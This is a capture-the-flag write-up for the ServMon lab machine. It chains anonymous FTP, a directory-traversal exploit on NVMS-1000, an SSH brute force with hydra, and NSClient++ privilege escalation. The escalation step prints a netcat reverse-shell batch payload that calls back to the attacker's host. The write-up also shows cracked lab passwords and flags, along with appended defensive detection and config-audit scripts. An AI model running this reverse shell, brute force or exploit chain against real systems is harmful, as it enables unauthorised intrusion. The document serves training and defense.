TL;DR
- Connect as Anonymous to FTP server and find notes about the location of the passwords file
- Use LFI on NVMS to read the passwords file
- Brute-force SSH with the passwords file to get access
- Reuse password to connect to the NSClient++ web UI
- Create an NSClient++ scheduled task to execute a reverse shell as Administrator
User.txt
Reconnaissance
Let’s start with an Nmap scan:
magnussen@funcMyLife:~/servmon$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
# Nmap 7.60 scan initiated Sat Apr 18 18:36:13 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN servmon.txt 10.10.10.184
Increasing send delay for 10.10.10.184 from 0 to 5 due to 136 out of 453 dropped probes since last increase.
Warning: 10.10.10.184 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.184 from 640 to 1000 due to 185 out of 616 dropped probes since last increase.
Nmap scan report for servmon.htb (10.10.10.184)
Host is up, received echo-reply ttl 127 (0.078s latency).
Scanned at 2020-04-18 18:36:13 CEST for 306s
Not shown: 54168 closed ports, 11351 filtered ports
Reason: 54168 resets and 11351 no-responses
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDnC92+BCplDo38VDQIZzb7V3HN/OucvxF0VMDDoYShdUrpDUW6JcSR/Zr6cADbHy7eDLw2O+WW+M4SzH7kfpbTv3HvJ0z8iOsRs2nUrUint4CR/A2vYA9SFOk18FU0QUS0sByBIlemU0uiPxN+iRCcpFhZDj+eiVRF7o/XxNbExnhU/2n9MXwFS8XTYNeGqSLE1vV6KdpMfpJj/yey8gvEpDQTX5OQK+kkUHze3LXLyu/XVTKzfqUBMAP+IQ5F6ICWgaC1a+cx/D7C/aobCbqaXY+75t1mxbEMmm1Wv/42nVQxcT7tN2C3sds4VJkYgZKcBhsE0XdJcR9mTb1wWsg9
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMToH2eB7rzpMZuvElpHYko/TXSsOfG8EXWQxmC/T4PCaAmVRDgJWEFMHgpRilSAKoOBlS2RHWNpMJldTFbWSVo=
| 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILbqSRVLRJFVNhD0W0C5xB7b3RoJZZKdM+jSGryFWOQa
80/tcp open tcpwrapped syn-ack ttl 127
|_http-favicon: Unknown favicon MD5: 3AEF8B29C4866F96A539730FAB53A88F
| http-methods:
|_ Supported Methods: POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5040/tcp open unknown syn-ack ttl 127
5666/tcp open tcpwrapped syn-ack ttl 127
6063/tcp open x11? syn-ack ttl 127
6699/tcp open napster? syn-ack ttl 127
7680/tcp open pando-pub? syn-ack ttl 127
8443/tcp open ssl/https-alt syn-ack ttl 127
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
|_ Document not found
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-01-14T13:24:20
| Not valid after: 2021-01-13T13:24:20
| MD5: 1d03 0c40 5b7a 0f6d d8c8 78e3 cba7 38b4
| SHA-1: 7083 bd82 b4b0 f9c0 cc9c 5019 2f9f 9291 4694 8334
|_ssl-date: TLS randomness does not represent time
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 40676/tcp): CLEAN (Couldn't connect)
| Check 2 (port 20065/tcp): CLEAN (Couldn't connect)
| Check 3 (port 54993/udp): CLEAN (Failed to receive data)
| Check 4 (port 62863/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-18 18:43:52
|_ start_date: 1601-01-01 00:09:21
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 18 18:41:19 2020 -- 1 IP address (1 host up) scanned in 306.51 seconds
So we find 4 useful services:
- FTP (21)
- SSH (22)
- IIS (80)
- NSClient++ (8443)
The website is the NVMS login page.
FTP anonymous
Let’s try to connect to the FTP service with the anonymous account.
magnussen@funcMyLife:~/servmon$ ftp
ftp> open 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:magnussen): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
01-18-20 12:05PM <DIR> Users
ftp> dir Users
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan
ftp> dir Users/Nadine
01-18-20 12:08PM 174 Confidential.txt
ftp> get Users/Nadine/Confidential.txt
226 Transfer complete.
174 bytes received in 0.06 secs (2.8721 kB/s)
ftp> dir Users/Nathan
01-18-20 12:10PM 186 Notes to do.txt
ftp> get Users/Nathan/Notes\ to\ do.txt
226 Transfer complete.
186 bytes received in 0.06 secs (2.9735 kB/s)
So there are two directories, Nadine and Nathan, probably two system users. We also retrieved two text files; let’s read them.
magnussen@funcMyLife:~/servmon$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine
magnussen@funcMyLife:~/servmon$ cat Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint
Ok, it seems there’s a passwords file on Nathan’s desktop.
NVMS-1000 LFI
When we search for CVEs on NVMS-1000, we find the following exploit: TVT NVMS 1000 - Directory Traversal.
Let’s check that out:
This NVMS-1000 version is vulnerable to LFI, so let’s try to retrieve the passwords file mentioned earlier.
Nice, we retrieve a password list.
SSH brute force
So we have a password list and some usernames. Let’s brute-force the SSH service to see if we can connect to it with an account.
As SSH usernames are case sensitive, I’ve created a file with the two usernames, each with the first letter in upper and lower case:
magnussen@funcMyLife:~/servmon$ cat user.txt
Nadine
nadine
Nathan
nathan
magnussen@funcMyLife:~/servmon$
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$
magnussen@funcMyLife:~/servmon$ hydra -L user.txt -P Passwords.txt -s 22 -f servmon.htb ssh
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2020-04-19 01:41:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://servmon.htb:22/
[22][ssh] host: servmon.htb login: Nadine password: L1k3B1gBut7s@W0rk
[STATUS] attack finished for servmon.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-04-19 01:41:10
Nice, we can log in as Nadine with L1k3B1gBut7s@W0rk.
magnussen@funcMyLife:~/servmon$ ssh Nadine@servmon.htb
Nadine@servmon.htb's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
nadine@SERVMON C:\Users\Nadine>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine
19/04/2020 00:42 <DIR> .
19/04/2020 00:42 <DIR> ..
19/04/2020 00:23 <DIR> .ssh
18/01/2020 11:23 <DIR> 3D Objects
18/01/2020 11:23 <DIR> Contacts
08/04/2020 22:28 <DIR> Desktop
08/04/2020 22:28 <DIR> Documents
18/01/2020 11:23 <DIR> Downloads
08/04/2020 22:27 <DIR> Favorites
08/04/2020 22:27 <DIR> Links
18/01/2020 11:23 <DIR> Music
18/01/2020 11:31 <DIR> OneDrive
18/01/2020 11:23 <DIR> Pictures
18/01/2020 11:23 <DIR> Saved Games
18/01/2020 11:23 <DIR> Searches
18/01/2020 11:23 <DIR> Videos
0 File(s) 0 bytes
16 Dir(s) 27,439,128,576 bytes free
nadine@SERVMON C:\Users\Nadine>cd Desktop
nadine@SERVMON C:\Users\Nadine\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Nadine\Desktop
08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
19/04/2020 00:16 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 27,438,882,816 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
3f12d64256b352f6d6aa65bd0e64e78c
Great, we have the user.txt flag. Just have to privesc now!
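Added example, not part of the original write-up: the login attempts above (a handful of user names, including case variants, against a short password list within seconds from one address) leave a recognisable pattern in sshd logs. This Python detector flags it on constructed log lines; the timestamp prefix, the thresholds and the function names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed line format: "<YYYY-MM-DD HH:MM:SS> ... Failed|Accepted password for
# [invalid user ]<user> from <ip> port <n> ssh2" (OpenSSH's standard messages).
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) .*?"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def build_sample():
    """Constructed log, not captured from the box: 12 failures, 1 success."""
    start = datetime(2020, 4, 19, 1, 41, 4)
    users = ("Nadine", "nadine", "Nathan", "nathan")
    lines = []
    for n in range(12):  # failed guesses spread over six seconds
        ts = start + timedelta(seconds=n // 2)
        lines.append(f"{ts} sshd: Failed password for {users[n % 4]} "
                     f"from 10.10.15.111 port {50000 + n} ssh2")
    lines.append(f"{start + timedelta(seconds=6)} sshd: Accepted password "
                 "for Nadine from 10.10.15.111 port 50012 ssh2")
    # Unrelated single failure from another (documentation-range) address.
    lines.append(f"{start} sshd: Failed password for nathan "
                 "from 192.0.2.7 port 40000 ssh2")
    return "\n".join(lines)

def detect(log_text, window=timedelta(seconds=60), min_failures=10):
    """Return {source_ip: details} for bursts of failed password logins."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            by_ip[m["ip"]].append((ts, m["result"], m["user"]))
    alerts = {}
    for ip, events in by_ip.items():
        events.sort()
        fails = [e for e in events if e[1] == "Failed"]
        # Largest number of failures inside any window starting at a failure.
        burst = max((sum(1 for t, _, _ in fails if f[0] <= t < f[0] + window)
                     for f in fails), default=0)
        if not fails or burst < min_failures:
            continue
        users = {u for _, _, u in fails}
        alerts[ip] = {
            "burst": burst,
            "users": sorted(users),
            # Nadine/nadine style guesses collapse to one name when case-folded.
            "case_variants": len({u.casefold() for u in users}) < len(users),
            # A success after the first failure means the guessing worked.
            "compromised": sorted({u for t, r, u in events
                                   if r == "Accepted" and t >= fails[0][0]}),
        }
    return alerts

if __name__ == "__main__":
    print(detect(build_sample()))
```

A non-empty `compromised` list is the part to escalate on: it means the account's password should be rotated, not just the source address blocked.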
I AM ROOT
NSClient++ privilege escalation
Previously we found the NSClient++ web UI:
NSClient++ is a monitoring agent used with Nagios.
If we check for CVE on NSClient we find NSClient++ 0.5.2.35 - Privilege Escalation.
Let’s retrieve the password of the WEB UI to exploit this CVE.
nadine@SERVMON C:\Users\Nadine\Desktop>cd "C:\Program Files"
nadine@SERVMON C:\Program Files>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Program Files
08/04/2020 23:21 <DIR> .
08/04/2020 23:21 <DIR> ..
08/04/2020 23:21 <DIR> Common Files
08/04/2020 23:18 <DIR> Internet Explorer
19/03/2019 05:52 <DIR> ModifiableWindowsApps
16/01/2020 19:11 <DIR> NSClient++
08/04/2020 23:09 <DIR> Reference Assemblies
08/04/2020 23:21 <DIR> UNP
14/01/2020 09:14 <DIR> VMware
08/04/2020 22:31 <DIR> Windows Defender
08/04/2020 22:45 <DIR> Windows Defender Advanced Threat Protection
19/03/2019 05:52 <DIR> Windows Mail
19/03/2019 12:43 <DIR> Windows Multimedia Platform
19/03/2019 06:02 <DIR> Windows NT
19/03/2019 12:43 <DIR> Windows Photo Viewer
19/03/2019 12:43 <DIR> Windows Portable Devices
19/03/2019 05:52 <DIR> Windows Security
19/03/2019 05:52 <DIR> WindowsPowerShell
0 File(s) 0 bytes
18 Dir(s) 27,434,434,560 bytes free
nadine@SERVMON C:\Program Files>cd "NSClient++"
nadine@SERVMON C:\Program Files\NSClient++>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Program Files\NSClient++
16/01/2020 19:11 <DIR> .
16/01/2020 19:11 <DIR> ..
09/12/2015 01:17 28,672 boost_chrono-vc110-mt-1_58.dll
09/12/2015 01:17 50,688 boost_date_time-vc110-mt-1_58.dll
09/12/2015 01:17 117,760 boost_filesystem-vc110-mt-1_58.dll
09/12/2015 01:22 439,296 boost_program_options-vc110-mt-1_58.dll
09/12/2015 01:23 256,000 boost_python-vc110-mt-1_58.dll
09/12/2015 01:17 765,952 boost_regex-vc110-mt-1_58.dll
09/12/2015 01:16 19,456 boost_system-vc110-mt-1_58.dll
09/12/2015 01:18 102,400 boost_thread-vc110-mt-1_58.dll
14/01/2020 14:24 51 boot.ini
18/01/2018 16:51 157,453 changelog.txt
28/01/2018 23:33 1,210,392 check_nrpe.exe
19/04/2020 00:50 <DIR> crash-dumps
05/11/2017 22:09 318,464 Google.ProtocolBuffers.dll
09/12/2015 00:16 1,655,808 libeay32.dll
05/11/2017 23:04 18,351 license.txt
05/10/2017 08:19 203,264 lua.dll
14/01/2020 14:24 <DIR> modules
19/04/2020 00:47 3,792 nsclient.ini
19/04/2020 00:49 48,207 nsclient.log
05/11/2017 22:42 55,808 NSCP.Core.dll
28/01/2018 23:32 4,765,208 nscp.exe
05/11/2017 22:42 483,328 NSCP.Protobuf.dll
19/11/2017 17:18 534,016 nscp_json_pb.dll
19/11/2017 16:55 2,090,496 nscp_lua_pb.dll
23/01/2018 21:57 507,904 nscp_mongoose.dll
19/11/2017 16:49 2,658,304 nscp_protobuf.dll
05/11/2017 23:04 3,921 old-settings.map
28/01/2018 23:21 1,973,760 plugin_api.dll
23/05/2015 09:44 3,017,216 python27.dll
27/09/2015 16:42 28,923,515 python27.zip
28/01/2018 23:34 384,536 reporter.exe
19/04/2020 00:24 <DIR> scripts
14/01/2020 14:24 <DIR> security
09/12/2015 00:16 348,160 ssleay32.dll
23/05/2015 09:44 689,664 unicodedata.pyd
14/01/2020 14:24 <DIR> web
05/11/2017 22:20 1,273,856 where_filter.dll
23/05/2015 09:44 47,616 _socket.pyd
33 File(s) 53,153,314 bytes
7 Dir(s) 27,433,824,256 bytes free
nadine@SERVMON C:\Program Files\NSClient++>typensclient.ini
'typensclient.ini' is not recognized as an internal or external command,
operable program or batch file.
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help
; in flight - TODO
[/settings/default]
; Undocumented key
password = ew2x6SsGTxjRwXOT
; Undocumented key
allowed hosts = 127.0.0.1
; in flight - TODO
[/settings/NRPE/server]
; Undocumented key
ssl options = no-sslv2,no-sslv3
; Undocumented key
verify mode = peer-cert
; Undocumented key
insecure = false
; in flight - TODO
[/modules]
; Undocumented key
CheckHelpers = disabled
; Undocumented key
CheckEventLog = disabled
; Undocumented key
CheckNSCP = disabled
; Undocumented key
CheckDisk = disabled
; Undocumented key
CheckSystem = disabled
; Undocumented key
WEBServer = enabled
; Undocumented key
NRPEServer = enabled
; CheckTaskSched - Check status of your scheduled jobs.
CheckTaskSched = enabled
; Scheduler - Use this to schedule check commands and jobs in conjunction with for instance passive monitoring through NSCA
Scheduler = enabled
; CheckExternalScripts - Module used to execute external scripts
CheckExternalScripts = enabled
; Script wrappings - A list of templates for defining script commands. Enter any command line here and they will be expanded by scripts placed under the wrapped scripts section. %SCRIPT% will be replaced by the actual script an %ARGS% will be replaced by any given arguments.
[/settings/external scripts/wrappings]
; Batch file - Command used for executing wrapped batch files
bat = scripts\\%SCRIPT% %ARGS%
; Visual basic script - Command line used for wrapped vbs scripts
vbs = cscript.exe //T:30 //NoLogo scripts\\lib\\wrapper.vbs %SCRIPT% %ARGS%
; POWERSHELL WRAPPING - Command line used for executing wrapped ps1 (powershell) scripts
ps1 = cmd /c echo If (-Not (Test-Path "scripts\%SCRIPT%") ) { Write-Host "UNKNOWN: Script `"%SCRIPT%`" not found."; exit(3) }; scripts\%SCRIPT% $ARGS$; exit($lastexitcode) | powershell.exe /noprofile -command -
; External scripts - A list of scripts available to run from the CheckExternalScripts module. Syntax is: `command=script arguments`
[/settings/external scripts/scripts]
; Undocumented key
gen = scripts\gen.bat
; Schedules - Section for the Scheduler module.
[/settings/scheduler/schedules]
; Undocumented key
foobar = command = foobar
; External script settings - General settings for the external scripts module (CheckExternalScripts).
[/settings/external scripts]
allow arguments = true
; SCHEDULE DEFENITION - Schedule definition for: default
[/settings/scheduler/schedules/default]
; SCHEDULE INTERAVAL - Time in seconds between each check
interval = 60
; Web server - Section for WEB (WEBServer.dll) (check_WEB) protocol options.
[/settings/WEB/server]
; ALLOWED HOSTS - A comma separated list of allowed hosts. You can use netmasks (/ syntax) or * to create ranges. parent for this key is found under: /settings/default this is marked as advanced in favor of the parent.
allowed hosts = 127.0.0.1,10.10.15.43/23,10.10.14.8/23
; script: default - The configuration section for the default script.
[/settings/external scripts/scripts/default]
We found the password to connect to the web UI (ew2x6SsGTxjRwXOT), and we find another interesting piece of information: the only host allowed to connect to the admin menu is localhost.
Not a problem, let’s do some port forwarding before accessing the web UI.
magnussen@funcMyLife:~/servmon$ ssh -L 8443:127.0.0.1:8443 Nadine@servmon.htb
Nadine@servmon.htb's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
First of all, we have to upload our payload and the netcat executable to the victim so we can execute them there.
magnussen@funcMyLife:~/servmon$ cat magnussen.bat
@echo off
c:\temp\nc.exe 10.10.15.111 7777 -e cmd.exe
magnussen@funcMyLife:~/servmon$ scp magnussen.bat Nadine@servmon.htb:c:/temp/
Nadine@servmon.htb's password:
magnussen.bat 100% 54 0.8KB/s 00:00
magnussen@funcMyLife:~/servmon$ scp nc.exe Nadine@servmon.htb:c:/temp/
nc.exe 100% 54 0.8KB/s 00:00
We have to create a custom script through the web UI in order to execute our payload with a scheduled task.
Then we have to create a scheduled task to execute our custom script.
Finally, we restart the service in order to apply the new configuration and wait for the connection.
magnussen@funcMyLife:~/servmon$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from servmon.htb 56452 received!
C:\Program Files\NSClient++> dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is 728C-D22C
Directory of C:\Users\Administrator\Desktop
08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
23/04/2020 08:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,433,795,584 bytes free
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
887fe3797897795b474ceba6a399f7bd
I AM ROOT!
This was a fun box, pretty easy, but I’ve learned a few things, thanks dmw0ng!
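Added example, not from the original write-up or the NSClient++ project: the escalation above depends on settings visible in nsclient.ini (a cleartext web UI password, the web server, scheduler and external scripts modules all enabled, argument passing allowed), and the custom script and scheduled task steps rely on the same settings. This Python audit reads a constructed, trimmed copy of that file and reports them; the password is a placeholder and the finding names are assumptions.

```python
import configparser
import ipaddress

# Constructed sample: trimmed nsclient.ini using the section and key names
# from the file shown in the write-up; the password is a placeholder.
SAMPLE_INI = """\
[/settings/default]
password = PLACEHOLDER-not-the-real-value
allowed hosts = 127.0.0.1

[/modules]
WEBServer = enabled
Scheduler = enabled
CheckExternalScripts = enabled

[/settings/external scripts]
allow arguments = true

[/settings/WEB/server]
allowed hosts = 127.0.0.1,10.10.15.43/23,10.10.14.8/23
"""

def is_loopback(entry):
    """True when an 'allowed hosts' entry covers loopback addresses only."""
    try:
        return ipaddress.ip_network(entry, strict=False).is_loopback
    except ValueError:
        return False  # wildcard or host name: cannot prove it is local

def audit(ini_text):
    """Return finding labels (names are this example's own) for risky settings."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   comment_prefixes=(";", "#"))
    cp.read_string(ini_text)

    def get(section, key):
        return cp.get(section, key, fallback="").strip()

    def enabled(module):
        return get("/modules", module).lower() in ("enabled", "1", "true")

    findings = []
    if get("/settings/default", "password"):
        findings.append("cleartext-password-in-ini")
    hosts = (get("/settings/WEB/server", "allowed hosts")
             or get("/settings/default", "allowed hosts"))
    remote = [h.strip() for h in hosts.split(",")
              if h.strip() and not is_loopback(h.strip())]
    if enabled("WEBServer") and remote:
        findings.append("web-ui-allows-remote:" + ",".join(remote))
    # The web UI can define an external script and schedule it; in the
    # write-up the resulting shell came back with Administrator rights.
    if all(enabled(m) for m in ("WEBServer", "Scheduler", "CheckExternalScripts")):
        findings.append("web-ui-can-schedule-scripts")
    if get("/settings/external scripts", "allow arguments").lower() == "true":
        findings.append("script-arguments-allowed")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_INI)))
```

A loopback-only `allowed hosts` value does not clear the finding on its own, since any local account with SSH access can forward the port as shown earlier; restricting read access to nsclient.ini and disabling the unused modules are the settings that matter.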